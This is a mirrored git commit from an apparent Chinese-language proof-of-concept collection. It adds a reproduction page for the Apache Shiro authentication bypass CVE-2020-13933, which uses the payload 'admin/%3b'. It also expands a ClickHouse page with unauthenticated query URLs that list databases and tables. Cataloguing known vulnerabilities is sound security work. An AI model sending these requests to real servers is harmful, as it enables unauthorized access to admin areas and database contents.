mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 02:37:58 +00:00
更新README.md
This commit is contained in:
parent
b9388f7b51
commit
c6248232c2
@ -438,6 +438,7 @@
|
|||||||
* Apache OF Biz RMI Bypass RCE CVE 2021 29200
|
* Apache OF Biz RMI Bypass RCE CVE 2021 29200
|
||||||
* Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
|
* Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
|
||||||
* Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
|
* Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
|
||||||
|
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
|
||||||
* Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437
|
* Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437
|
||||||
* Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483
|
* Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483
|
||||||
* Apache Solr JMX服务 RCE CVE-2019-12409
|
* Apache Solr JMX服务 RCE CVE-2019-12409
|
||||||
|
|||||||
25
Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md
Normal file
25
Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md
Normal file
@ -0,0 +1,25 @@
|
|||||||
|
# Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
|
||||||
|
2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。
|
||||||
|
|
||||||
|
## 漏洞影响
|
||||||
|
|
||||||
|
```
|
||||||
|
Apache Shiro < 1.6.0
|
||||||
|
```
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
|
||||||
|
正常访问 /admin,需要登录:
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
构造恶意请求绕过:
|
||||||
|
|
||||||
|
```
|
||||||
|
admin/%3b
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
BIN
Web服务器漏洞/images/image-20230724162154509.png
Normal file
BIN
Web服务器漏洞/images/image-20230724162154509.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 148 KiB |
BIN
Web服务器漏洞/images/image-20230724162320484.png
Normal file
BIN
Web服务器漏洞/images/image-20230724162320484.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 94 KiB |
@ -26,8 +26,19 @@ ClickHouse
|
|||||||
|
|
||||||

|

|
||||||
|
|
||||||
```php
|
```
|
||||||
/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
|
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
其他的SQL语句:
|
||||||
|
|
||||||
|
```
|
||||||
|
http://your-ip:8123/?query=SHOW%20DATABASES
|
||||||
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.tables
|
||||||
```
|
```
|
||||||
|
|
||||||

|
|
||||||
BIN
服务器应用漏洞/images/202202091258274-16898396122771.png
Normal file
BIN
服务器应用漏洞/images/202202091258274-16898396122771.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 534 KiB |
Loading…
x
Reference in New Issue
Block a user